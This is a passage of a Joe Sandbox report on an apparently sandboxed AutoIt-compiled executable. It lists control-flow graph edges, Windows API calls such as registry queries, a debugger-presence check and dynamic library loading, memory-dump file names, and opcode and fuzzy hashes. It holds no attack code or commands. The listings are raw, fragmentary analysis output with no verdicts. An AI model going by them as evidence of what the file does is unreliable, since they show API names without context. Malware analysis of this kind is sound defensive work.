655 7ff6b5b7dfbe-7ff6b5b7dfc0 648->655 660 7ff6b5b3294e-7ff6b5b32950 649->660 657 7ff6b5b3283c 652->657 658 7ff6b5b3299e-7ff6b5b329ab 652->658 671 7ff6b5b3299c 654->671 662 7ff6b5b7dfed-7ff6b5b7dff6 655->662 663 7ff6b5b7dfc2-7ff6b5b7dfc5 655->663 659 7ff6b5b32840-7ff6b5b32843 657->659 664 7ff6b5b329b1-7ff6b5b329be call 7ff6b5b44c24 658->664 665 7ff6b5b7e181-7ff6b5b7e197 call 7ff6b5b44c24 * 2 658->665 668 7ff6b5b32849-7ff6b5b32850 659->668 669 7ff6b5b32b17-7ff6b5b32b1d 659->669 660->652 670 7ff6b5b32956-7ff6b5b32966 660->670 666 7ff6b5b7dff8-7ff6b5b7e003 662->666 667 7ff6b5b7e005-7ff6b5b7e00c 662->667 663->659 673 7ff6b5b7dfcb-7ff6b5b7dfe7 call 7ff6b5b33c20 663->673 664->570 665->627 675 7ff6b5b7e00f-7ff6b5b7e016 call 7ff6b5bb8b98 666->675 667->675 668->563 668->565 669->668 677 7ff6b5b32b23-7ff6b5b32b2d 669->677 670->652 676 7ff6b5b3296c 670->676 671->660 673->662 688 7ff6b5b7e01c-7ff6b5b7e036 call 7ff6b5ba34e4 675->688 689 7ff6b5b7e0d7-7ff6b5b7e0d9 675->689 682 7ff6b5b7e0f4-7ff6b5b7e10e call 7ff6b5ba34e4 676->682 677->569 694 7ff6b5b7e147-7ff6b5b7e14e 682->694 695 7ff6b5b7e110-7ff6b5b7e11d 682->695 704 7ff6b5b7e038-7ff6b5b7e045 688->704 705 7ff6b5b7e06f-7ff6b5b7e076 688->705 691 7ff6b5b7e0db 689->691 692 7ff6b5b7e0df-7ff6b5b7e0ee call 7ff6b5bba320 689->692 691->692 692->682 694->668 696 7ff6b5b7e154-7ff6b5b7e15a 694->696 699 7ff6b5b7e135-7ff6b5b7e142 call 7ff6b5b44c24 695->699 700 7ff6b5b7e11f-7ff6b5b7e130 call 7ff6b5b44c24 * 2 695->700 696->668 702 7ff6b5b7e160-7ff6b5b7e169 696->702 699->694 700->699 702->665 710 7ff6b5b7e05d-7ff6b5b7e06a call 7ff6b5b44c24 704->710 711 7ff6b5b7e047-7ff6b5b7e058 call 7ff6b5b44c24 * 2 704->711 705->668 708 7ff6b5b7e07c-7ff6b5b7e082 705->708 708->668 713 7ff6b5b7e088-7ff6b5b7e091 708->713 710->705 711->710 713->689
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message$Peek$DispatchInputStateTimeTranslatetime
                                                                                                          • String ID:
                                                                                                          • API String ID: 3249950245-0
                                                                                                          • Opcode ID: 4e5214824c5420639b9de00f29baad83bafa904f2dd3af1d4c39dffda22c8357
                                                                                                          • Instruction ID: 40696a8ba323d84f274188791f9abf10abaf73fbefc926f961032970e890d358
                                                                                                          • Opcode Fuzzy Hash: 4e5214824c5420639b9de00f29baad83bafa904f2dd3af1d4c39dffda22c8357
                                                                                                          • Instruction Fuzzy Hash: 47226B32A0C6828BFB758B28E4643F977A1EB46F84F544135DB4E9669ACF3CE845C701

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 849 7ff6b5b23cbc-7ff6b5b23d88 CreateWindowExW * 2 ShowWindow * 2
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$Create$Show
                                                                                                          • String ID: AutoIt v3$d$edit
                                                                                                          • API String ID: 2813641753-2600919596
                                                                                                          • Opcode ID: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                          • Instruction ID: a27a4208e43831985199bef976ac2953187ce88757bc8a76e9c928766371802f
                                                                                                          • Opcode Fuzzy Hash: 412c1a8e669cd880a5e6e492a58c687317b7b955f6e005d5c76c80bfee5a5580
                                                                                                          • Instruction Fuzzy Hash: 12216A72A28B41C7E750CB18F4997A977B1F789B99F004238E68D86699CFBDC445CB00

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                            • Part of subcall function 00007FF6B5B42D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6B5B27FA5), ref: 00007FF6B5B42D8E
                                                                                                            • Part of subcall function 00007FF6B5B42D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6B5B27FA5), ref: 00007FF6B5B42D9C
                                                                                                            • Part of subcall function 00007FF6B5B42D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6B5B27FA5), ref: 00007FF6B5B42DAC
                                                                                                            • Part of subcall function 00007FF6B5B42D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6B5B27FA5), ref: 00007FF6B5B42DBC
                                                                                                            • Part of subcall function 00007FF6B5B42D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6B5B27FA5), ref: 00007FF6B5B42DCA
                                                                                                            • Part of subcall function 00007FF6B5B42D5C: MapVirtualKeyW.USER32(?,?,?,00007FF6B5B27FA5), ref: 00007FF6B5B42DD8
                                                                                                            • Part of subcall function 00007FF6B5B3EEC8: RegisterWindowMessageW.USER32 ref: 00007FF6B5B3EF76
                                                                                                          • GetStdHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5B2106D), ref: 00007FF6B5B28209
                                                                                                          • OleInitialize.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5B2106D), ref: 00007FF6B5B2828F
                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6B5B2106D), ref: 00007FF6B5B6D36A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                          • String ID: AutoIt
                                                                                                          • API String ID: 1986988660-2515660138
                                                                                                          • Opcode ID: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                          • Instruction ID: 7a9d4377883458ff95015ae03949b9b06a925ea8049604e14bda368a23c615cd
                                                                                                          • Opcode Fuzzy Hash: 05bbf670eb9e39fefa972cb9767a51cd3be064064f2c67d840eb130580157bae
                                                                                                          • Instruction Fuzzy Hash: B8C1FD22D18B6686F682DF1CA85A0F477B6BF95B40F10023ED64DE266BDF7C6941C780

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconLoadNotifyShell_Stringwcscpy
                                                                                                          • String ID: Line:
                                                                                                          • API String ID: 3135491444-1585850449
                                                                                                          • Opcode ID: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                          • Instruction ID: cf30c3e25574d9f6cd182e0e7b50abde0908ecfed8b3c3a278dc75d3416f75ae
                                                                                                          • Opcode Fuzzy Hash: 5074f82189a2094c4f41beacacc753a6552d6d2ec3054edcc5b8ee4ef305b935
                                                                                                          • Instruction Fuzzy Hash: A641C522A0C68696E720DB28D4612F92771FB46B84F941035E78C8369FDFBDED45CB50
                                                                                                          APIs
                                                                                                          • GetOpenFileNameW.COMDLG32 ref: 00007FF6B5B6BAA2
                                                                                                            • Part of subcall function 00007FF6B5B256D4: GetFullPathNameW.KERNEL32(?,00007FF6B5B256C1,?,00007FF6B5B27A0C,?,?,?,00007FF6B5B2109E), ref: 00007FF6B5B256FF
                                                                                                            • Part of subcall function 00007FF6B5B23EB4: GetLongPathNameW.KERNELBASE ref: 00007FF6B5B23ED8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Name$Path$FileFullLongOpen
                                                                                                          • String ID: AutoIt script files (*.au3, *.a3x)$Run Script:$au3
                                                                                                          • API String ID: 779396738-2360590182
                                                                                                          • Opcode ID: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                          • Instruction ID: 35a3f7fad13015b4ba6125ac332f5470b2602a6f674a82a7283678454c9b5daf
                                                                                                          • Opcode Fuzzy Hash: 3d3fc2c380e417bd563531e27a10fb74c95a399e56ca3ea23b17778c650accb1
                                                                                                          • Instruction Fuzzy Hash: AA316C62608B8289E710DF29E8501E9BBA4FB4AF84F584135DB8C87B5ADF3DD945CB10
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_Timer$Killwcscpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 3812282468-0
                                                                                                          • Opcode ID: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                                          • Instruction ID: d59cf7bac6d503c60b41b50eb42ddae4b7a1a49195d777ae3b149df4cc4ae4bc
                                                                                                          • Opcode Fuzzy Hash: 1dc440ecac87e2ff0ffd0982a4a0d0d2f1018b32bcde9ffe5d1424b8b2f1a591
                                                                                                          • Instruction Fuzzy Hash: 6031D122A0C78287EB618B2990602F97798EB46F84F185076CF4C47B8ECE3CDA44CB50
                                                                                                          APIs
                                                                                                          • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,?,?,00007FF6B5B26F52,?,?,?,?,?,?,00007FF6B5B2782C), ref: 00007FF6B5B26FA5
                                                                                                          • RegQueryValueExW.KERNELBASE(?,?,?,?,?,?,?,00007FF6B5B26F52,?,?,?,?,?,?,00007FF6B5B2782C), ref: 00007FF6B5B26FD3
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,00007FF6B5B26F52,?,?,?,?,?,?,00007FF6B5B2782C), ref: 00007FF6B5B26FFA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseOpenQueryValue
                                                                                                          • String ID:
                                                                                                          • API String ID: 3677997916-0
                                                                                                          • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                          • Instruction ID: 745cf16643ffaa1a7060a4b5e0a9548c7665e5767704896a092c6b91db8c2ecf
                                                                                                          • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                          • Instruction Fuzzy Hash: 9F219D33A18B4187D7108F29E4609AE77A4FB49F84B441135EB8DC3B59DF3AE814CB04
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 1703294689-0
                                                                                                          • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                          • Instruction ID: 5fc0d73ff7a2584eb753036771e725775a2c88d77594380792fb61124560e022
                                                                                                          • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                          • Instruction Fuzzy Hash: 0CE01A20B0430582EB546B689CA9BF92352AF8AF51F105038CA0E833DBCE3DEC088600
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Init_thread_footer
                                                                                                          • String ID: CALL
                                                                                                          • API String ID: 1385522511-4196123274
                                                                                                          • Opcode ID: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                                                                          • Instruction ID: 882cbd5d0c3f745a45675007f0bd0ecba929f03e8f1be8dfdff6ab6d4577420e
                                                                                                          • Opcode Fuzzy Hash: 24061c5982f2d3e817e045593c76e51459b54cde2f485c3431a9fa5c614c0b1a
                                                                                                          • Instruction Fuzzy Hash: 65224F72A086428AEB24DF69D4602FC37A1FB45F84F50413ADB4DA779ADF39E856C340
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFile
                                                                                                          • String ID:
                                                                                                          • API String ID: 823142352-0
                                                                                                          • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                                          • Instruction ID: 0dd010f7df6ff614cfef43c4a12cffe19af86bcfc46511bc934f3e9eb9a87455
                                                                                                          • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                                          • Instruction Fuzzy Hash: 9241637290874686E7648F18E4243B97B90EB46F64F144235DB6D8BACECF7ED8458B40
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Library$Load$AddressFreeProc
                                                                                                          • String ID:
                                                                                                          • API String ID: 2632591731-0
                                                                                                          • Opcode ID: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                                                                          • Instruction ID: 64f01d5a1f0807b5e46b40bef9eaa61281cf708a64ceb942aa9b53313ad0735d
                                                                                                          • Opcode Fuzzy Hash: 392ad9f8a410b3ba7add488219b3c7835b0d92f2120495b543ba498714cf74fb
                                                                                                          • Instruction Fuzzy Hash: 3C415D22B14A5686EB10DF29D8613FC27A0EB46F88F444135EB4D8769EDF3DD845C710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconNotifyShell_
                                                                                                          • String ID:
                                                                                                          • API String ID: 1144537725-0
                                                                                                          • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                                          • Instruction ID: b6486cf2e28a02356f8439203d962275f618245e85f2d161dccdf095dd8f7a58
                                                                                                          • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                                          • Instruction Fuzzy Hash: FF415732A09B4586EB518F19E4543A827A8FB4AF88F440139EB4C9738ACF7DE951C710
                                                                                                          APIs
                                                                                                          • IsThemeActive.UXTHEME ref: 00007FF6B5B23756
                                                                                                            • Part of subcall function 00007FF6B5B49334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6B5B49348
                                                                                                            • Part of subcall function 00007FF6B5B236E8: SystemParametersInfoW.USER32 ref: 00007FF6B5B23705
                                                                                                            • Part of subcall function 00007FF6B5B236E8: SystemParametersInfoW.USER32 ref: 00007FF6B5B23725
                                                                                                            • Part of subcall function 00007FF6B5B237B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B237F2
                                                                                                            • Part of subcall function 00007FF6B5B237B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B23807
                                                                                                            • Part of subcall function 00007FF6B5B237B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B2388D
                                                                                                            • Part of subcall function 00007FF6B5B237B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF6B5B23785), ref: 00007FF6B5B23924
                                                                                                          • SystemParametersInfoW.USER32 ref: 00007FF6B5B23797
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 4207566314-0
                                                                                                          • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                                          • Instruction ID: a9d0f37688d571556a8a7a84fb4b2faac1a7b286388df8aaa58683a159d6efe0
                                                                                                          • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                                          • Instruction Fuzzy Hash: B501FB72E0C2528BF751EB69A86A5F5A662AF06F00F441039D64DD62AFCF2DBC848710
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                          • String ID:
                                                                                                          • API String ID: 485612231-0
                                                                                                          • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                                          • Instruction ID: 7cc7c2184f3f717857ddbc255c876151126407513c985bac3a8d819479d76134
                                                                                                          • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                                          • Instruction Fuzzy Hash: 0FE04F51E5914382FE086BBAB8346F816916F46F41F444034CB0DC62DBDE2C9C854600
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
